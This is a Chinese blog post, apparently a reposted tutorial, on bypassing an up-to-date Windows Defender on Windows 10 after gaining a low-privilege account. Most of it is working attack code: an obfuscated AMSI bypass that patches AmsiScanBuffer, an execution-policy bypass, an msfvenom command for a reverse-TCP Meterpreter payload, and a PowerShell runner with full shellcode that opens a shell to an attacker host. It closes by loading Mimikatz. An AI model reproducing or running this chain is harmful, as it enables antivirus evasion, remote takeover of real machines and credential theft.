首页 > 系统相关 >绕过 Windows Defender (最新版本)

绕过 Windows Defender (最新版本)

时间:2023-01-25 19:04:52浏览次数:73  
标签:IntPtr Windows 0xff 0x0 System 0x41 0x48 Defender 绕过

在本文中,将绕过 Windows Defender(最新版本),并详细解释每个步骤。

准备

- Windows 10 机器(目标机)
- 已获取目标机的低级特权帐户
- Linux机器(攻击者)
- Defender Anti-Virus 在发布本文时正在运行并且是最新的

Payload

  • Payload Runner:
[Ref].Assembly.GetType('System.Management.Automation.Amsi'+[char]85+'tils').GetField('ams'+[char]105+'InitFailed','NonPublic,Static').SetValue($null,$true)
function LookupFunc {
Param ($moduleName, $functionName)
$assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].
Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
$tmp=@()
$assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
$assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
@($moduleName)), $functionName))
}
function getDelegateType {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
[Parameter(Position = 1)] [Type] $delType = [Void]
)
$type = [AppDomain]::CurrentDomain.
DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
[System.Reflection.Emit.AssemblyBuilderAccess]::Run).
DefineDynamicModule('InMemoryModule', $false).
DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',
[System.MulticastDelegate])
$type.
DefineConstructor('RTSpecialName, HideBySig, Public',
[System.Reflection.CallingConventions]::Standard, $func).
SetImplementationFlags('Runtime, Managed')
$type.
DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).
SetImplementationFlags('Runtime, Managed')
return $type.CreateType()
}
$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc),
(getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, 0x3000, 0x40)
[Byte[]] $buf = <PAYLOAD HEAD>
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length)
$hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread),
(getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WaitForSingleObject),
(getDelegateType @([IntPtr], [Int32])([Int]))).Invoke($hThread, 0xFFFFFFFF)


  • AMSI 绕过(Windows反恶意软件扫描接口)
$xudbk = @"
using System;
using System.Runtime.InteropServices;
public class xudbk {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr pbsxld, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $xudbk
$wvyfoqc = [xudbk]::LoadLibrary("$(('âmsì.'+'dll').nOrMALIZe([cHAR](70)+[ChAR]([BYTE]0x6f)+[CHAr](114)+[ChAR]([byTe]0x6d)+[CHAR](68*12/12)) -replace [Char](92+19-19)+[cHar]([ByTe]0x70)+[cHaR](123+15-15)+[chAR](77)+[Char](110*102/102)+[cHar]([BytE]0x7d))")
$dhdzwx = [xudbk]::GetProcAddress($wvyfoqc, "$(('ÁmsìScänBu'+'ffer').NorMAlIZE([chaR]([byTE]0x46)+[chAR](111)+[char]([Byte]0x72)+[chAR]([BYtE]0x6d)+[CHar]([byTE]0x44)) -replace [cHar]([BYTe]0x5c)+[CHAr](112)+[cHAR]([bytE]0x7b)+[char]([bytE]0x4d)+[ChAR](110)+[CHAR](125+4-4))")
$p = 0
[xudbk]::VirtualProtect($dhdzwx, [uint32]5, 0x40, [ref]$p)
$qbzv = "0xB8"
$dnyd = "0x57"
$ttvz = "0x00"
$xcoe = "0x07"
$vslp = "0xC3"
$dcios = [Byte[]] ($qbzv,$dnyd,$ttvz,$xcoe,+$dlsl,+$vslp)
[System.Runtime.InteropServices.Marshal]::Copy($dcios, 0, $dhdzwx, 6)
  • 执行策略绕过
Set-ExecutionPolicy Unrestricted -Scope CurrentUser
  • 生成 Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=443 EXITFUNC=thread -f powershell

前提

在目标机器上获取了一个低权限用户,目标机器正在使用 Windows Defender,所有保护措施都已到位,但下一步是执行多个脚本和枚举工具以找到特权升级向量,但 Windows Defender 阻止了所有尝试。

为此,必须找到一种规避技术,可以通过本文了解该技术。

绕过过程

  • 绕过执行策略
  • 绕过反恶意软件扫描接口 (AMSI)
  • 生成有效载荷
  • 创建 PowerShell 运行程序
  • 执行 PowerShell Runner,启动最终有效负载

概念验证 (PoC)

我们将在"test"用户的上下文中工作,这是目标机器上的标准本地帐户。

绕过 Windows Defender (最新版本)_System

另外,检查目标机器上的 Windows Defender 状态:

绕过 Windows Defender (最新版本)_System_02

绕过 Windows Defender (最新版本)_System_03

Windows Defender 是最新的并且在启用所有模块的情况下运行。

首先,我们将在目标的机器上打开一个 PowerShell 终端,并将执行策略设置为不受限制,使用以下命令:

Set-ExecutionPolicy Unrestricted -Scope CurrentUser

绕过 Windows Defender (最新版本)_System_04

接下来,我们将检查反恶意软件扫描接口 (AMSI) 是否到位。如果你想了解更多关于 AMSI 的内容,可以查看windows官方文档 。使用以下命令检查 AMSI 是否正在运行:'amsiutils'

绕过 Windows Defender (最新版本)_Windows_05

如果显示红色警告信息,则表示它运行正常。

接下来,我们将尝试通过将脚本(来自本文的"payload"部分)直接复制粘贴到我们的 PowerShell 控制台来绕过 AMSI:

$xudbk = @"
using System;
using System.Runtime.InteropServices;
public class xudbk {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr pbsxld, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $xudbk
$wvyfoqc = [xudbk]::LoadLibrary("$(('âmsì.'+'dll').nOrMALIZe([cHAR](70)+[ChAR]([BYTE]0x6f)+[CHAr](114)+[ChAR]([byTe]0x6d)+[CHAR](68*12/12)) -replace [Char](92+19-19)+[cHar]([ByTe]0x70)+[cHaR](123+15-15)+[chAR](77)+[Char](110*102/102)+[cHar]([BytE]0x7d))")
$dhdzwx = [xudbk]::GetProcAddress($wvyfoqc, "$(('ÁmsìScänBu'+'ffer').NorMAlIZE([chaR]([byTE]0x46)+[chAR](111)+[char]([Byte]0x72)+[chAR]([BYtE]0x6d)+[CHar]([byTE]0x44)) -replace [cHar]([BYTe]0x5c)+[CHAr](112)+[cHAR]([bytE]0x7b)+[char]([bytE]0x4d)+[ChAR](110)+[CHAR](125+4-4))")
$p = 0
[xudbk]::VirtualProtect($dhdzwx, [uint32]5, 0x40, [ref]$p)
$qbzv = "0xB8"
$dnyd = "0x57"
$ttvz = "0x00"
$xcoe = "0x07"
$vslp = "0xC3"
$dcios = [Byte[]] ($qbzv,$dnyd,$ttvz,$xcoe,+$dlsl,+$vslp)
[System.Runtime.InteropServices.Marshal]::Copy($dcios, 0, $dhdzwx, 6)

绕过 Windows Defender (最新版本)_Windows_06

再次执行 'amsiutils' ,你会看到红色警告不再显示,这表明AMSI 已被禁用。

绕过 Windows Defender (最新版本)_Windows_07

现在使用 MSFVenom 在攻击机中生成一个 Meterpreter 有效负载。使用一个公共端口,例如 443,以绕过任何适当的防火墙规则,并可能避免生成任何警报。

绕过 Windows Defender (最新版本)_Public_08

我们将生成的有效载荷复制粘贴到我们的目标器中(可以在文章开头的'payload'部分找到),我们将得到最终版本:

[Ref].Assembly.GetType('System.Management.Automation.Amsi'+[char]85+'tils').GetField('ams'+[char]105+'InitFailed','NonPublic,Static').SetValue($null,$true)
function LookupFunc {
Param ($moduleName, $functionName)
$assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].
Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
$tmp=@()
$assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
$assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
@($moduleName)), $functionName))
}
function getDelegateType {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
[Parameter(Position = 1)] [Type] $delType = [Void]
)
$type = [AppDomain]::CurrentDomain.
DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
[System.Reflection.Emit.AssemblyBuilderAccess]::Run).
DefineDynamicModule('InMemoryModule', $false).
DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',
[System.MulticastDelegate])
$type.
DefineConstructor('RTSpecialName, HideBySig, Public',
[System.Reflection.CallingConventions]::Standard, $func).
SetImplementationFlags('Runtime, Managed')
$type.
DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).
SetImplementationFlags('Runtime, Managed')
return $type.CreateType()
}
$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc),
(getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, 0x3000, 0x40)
[Byte[]] $buf = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x51,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x56,0x4d,0x31,0xc9,0x48,0xf,0xb7,0x4a,0x4a,0x48,0x8b,0x72,0x50,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x8b,0x48,0x18,0x50,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x41,0x58,0x41,0x58,0x5e,0x59,0x48,0x1,0xd0,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x0,0x0,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x1,0x0,0x0,0x49,0x89,0xe5,0x49,0xbc,0x2,0x0,0x1,0xbb,0xc0,0xa8,0x3,0x4,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x7,0xff,0xd5,0x4c,0x89,0xea,0x68,0x1,0x1,0x0,0x0,0x59,0x41,0xba,0x29,0x80,0x6b,0x0,0xff,0xd5,0x6a,0xa,0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xa,0x49,0xff,0xce,0x75,0xe5,0xe8,0x93,0x0,0x0,0x0,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x4,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,0x59,0x68,0x0,0x10,0x0,0x0,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x0,0x40,0x0,0x0,0x41,0x58,0x6a,0x0,0x5a,0x41,0xba,0xb,0x2f,0xf,0x30,0xff,0xd5,0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,0xff,0xff,0xff,0x48,0x1,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,0xff,0xe7,0x58,0x6a,0x0,0x59,0xbb,0xe0,0x1d,0x2a,0xa,0x41,0x89,0xda,0xff,0xd5
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length)
$hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread),
(getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WaitForSingleObject),
(getDelegateType @([IntPtr], [Int32])([Int]))).Invoke($hThread, 0xFFFFFFFF)

我们将使用 Metasploit 在攻击机中启动我们的侦听器。

绕过 Windows Defender (最新版本)_System_09

最后,让我们将运行程序直接复制粘贴到受害者机器的 PowerShell 控制台中。

绕过 Windows Defender (最新版本)_Public_10

查看handler

绕过 Windows Defender (最新版本)_Windows_11

拿到shell  !!!

绕过 Windows Defender (最新版本)_System_12

只需 5 个简单的步骤,我们就能够在所有模块都启动并运行的情况下绕过 Windows Defender。

让我们尝试在我们的 meterpreter shell 中运行 Mimikatz(通常会立即被 Defender 拒绝)。

绕过 Windows Defender (最新版本)_System_13

load 成功!


关注公众号,内容更精彩:

绕过 Windows Defender (最新版本)_Public_14

标签:IntPtr,Windows,0xff,0x0,System,0x41,0x48,Defender,绕过
From: https://blog.51cto.com/u_15945480/6022706

相关文章

  • Windows: Screenshot
     全屏:到clipboardfn+printscreen 保存到C:\Users\Memento\Pictures\Screenshotsfn+win+printscreen f SnippingToolwin+shift......
  • windows下解决机械硬盘Load_Cycle_Count过高的问题
          通常,硬盘制造商规定的Load_Cycle_Count数目上限是600,000次,要是超过300,000次就会影响到正常的读写,再多的话就差不多要报废了。windows下通过修改高级电源设......
  • 【Windows】笔记本查看电池报告
    ✨笔记本查看电池报告可以使用如下命令生成电池报告powercfg/batteryreport使用浏览器打开生成的html文件即可查看关于此设备详细的电池报告默认保存在用户目录下,保......
  • 【Windows】VMware Workstation 不可恢复错误 (vcpu-1)解决方案
    ✨报错提示✨解决方案查看log并无头绪,通过搜索引擎寻求解决方案此问题网络上有较多解决方案这里推荐最好的解决方案是安装VMwareWorkstationPro16或者更高版本......
  • windows 常用快捷键
    复制ctrl+c粘贴ctrl+v全选ctrl+a裁剪ctrl+x撤销ctrl+z保存ctrl+s关闭窗口alt+f4永久删除shift+delete远行windows+r打开文件管理windows+......
  • Windows11系统下配置JAVA环境变量(JDK-19版本)
    JDK下载1、访问oracle官网https://www.oracle.com/2、点击导航条中的Resources,点击DeveloperDownlads进入3、继续点击Java进入4、继续点击Java(JDK)for......
  • 微软将于1月31日停止销售Windows 10线上下载版
    微软将在本月晚些时候取消Windows10家庭版和专业版的线上下载渠道的销售。这些下载包括Windows10的许可证密钥(激活和使用下载的必要条件),这些内容还会在微软于2025年10月1......
  • Windows 设置显示亮度代码【msdn】
    ​​GetPhysicalMonitorsFromHMONITORfunction​​Microsoftcode:HMONITORhMonitor=NULL;DWORDcPhysicalMonitors;LPPHYSICAL_MONITORpPhysicalMonitors=NULL;//Ge......
  • 【Windows】应用软件注册表位置
    ✨应用软件注册表位置搜索注册表编辑器或者regedit在注册表编辑器中,定位到HKEY_CURRENT_USER\Software大部分用户安装的应用软件注册表都在这个地方可以根据软件名......
  • windows2012无法自动安装VMwareTools的解决办法
    在VMware中装了台windowsserver2012,可能是系统在虚拟化环境里存在问题,无法像win7、win10那样装好后自动安装VMwareTools,没有安装VMwareTools的情况下系统就像没有安装......